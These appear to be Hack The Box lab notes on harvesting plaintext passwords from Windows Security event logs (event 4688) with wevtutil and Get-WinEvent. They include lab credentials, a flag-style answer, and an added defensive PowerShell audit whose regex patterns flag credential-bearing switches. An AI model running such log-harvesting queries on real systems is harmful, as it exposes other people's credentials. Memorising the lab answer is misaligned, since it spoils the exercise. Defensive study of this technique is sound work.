Check membership of the Event Log Readers group:

net localgroup "Event Log Readers"

Search the Security log for command lines containing "/user" with wevtutil:

wevtutil qe Security /rd:true /f:text | Select-String "/user"

Querying a remote host with explicit credentials:

wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 | findstr "/user"

<aside> 💡

Reading the Security event log with Get-WinEvent requires administrator access; membership in Event Log Readers is not sufficient.

</aside>

Search using Get-WinEvent:

PS C:\htb> Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'} | Select-Object @{name='CommandLine';expression={ $_.Properties[8].Value }}

CommandLine
-----------
net use T: \\fs01\backups /user:tim MyStr0ngP@ssword

Event ID 4688 → process creation. The command line (Properties[8]) is only recorded when command-line auditing ("Include command line in process creation events") is enabled.
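Added example (not part of the original notes): a defender-side audit that scans 4688 events for the credential-bearing switches seen above (`/user:`, `/pass:`, and wevtutil's own `/p:`) and reports each hit with the secret masked, so the exposed account can be rotated. It assumes an administrative session (per the note above) and that command-line auditing is enabled; the function names and the `****` mask are this example's own.

```powershell
# Patterns for command-line switches that carry a plaintext secret.
# Ordered so the most specific switch wins when a line has several.
$CredPatterns = @(
    '/pass:(?<secret>\S+)',          # cmdkey /add:HOST /user:x /pass:<secret>
    '/p:(?<secret>\S+)',             # wevtutil ... /u:x /p:<secret>
    '/user:\S+\s+(?<secret>\S+)'     # net use X: \\srv\share /user:x <secret>
)

# Returns the command line with the secret masked, or $null if no pattern matches.
function Find-CredentialInCommandLine {
    param([Parameter(Mandatory)][string]$CommandLine)
    foreach ($pattern in $CredPatterns) {
        if ($CommandLine -match $pattern) {
            return $CommandLine.Replace($Matches['secret'], '****')
        }
    }
    return $null
}

# Pulls recent 4688 events and emits one record per credential exposure.
function Get-CredentialExposure {
    param([int]$MaxEvents = 5000, [string]$ComputerName = $env:COMPUTERNAME)
    $filter = @{ LogName = 'Security'; Id = 4688 }
    Get-WinEvent -ComputerName $ComputerName -MaxEvents $MaxEvents -FilterHashtable $filter |
        ForEach-Object {
            # 4688 layout: [1] SubjectUserName, [5] NewProcessName, [8] CommandLine
            $cmd = $_.Properties[8].Value
            if ([string]::IsNullOrWhiteSpace($cmd)) { return }   # auditing off or no args
            $masked = Find-CredentialInCommandLine -CommandLine $cmd
            if ($masked) {
                [pscustomobject]@{
                    TimeCreated = $_.TimeCreated
                    Computer    = $_.MachineName
                    SubjectUser = $_.Properties[1].Value
                    Process     = $_.Properties[5].Value
                    CommandLine = $masked
                }
            }
        }
}

# Usage: Get-CredentialExposure | Format-Table -AutoSize
```

Each reported SubjectUser/CommandLine pair identifies an account whose password has been written into the Security log and should be treated as compromised.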

Writeup

PS C:\Users\logger> wevtutil qe Security /rd:true /f:text | Select-String "/user"

        Process Command Line:   cmdkey  /add:WEB01 /user:amanda /pass:Passw0rd!
        Process Command Line:   net  use Z: \\DB01\scripts /user:mary W1ntergreen_gum_2021!
        Process Command Line:   net  use T: \\fs01\backups /user:tim MyStr0ngP@ssword

→ W1ntergreen_gum_2021!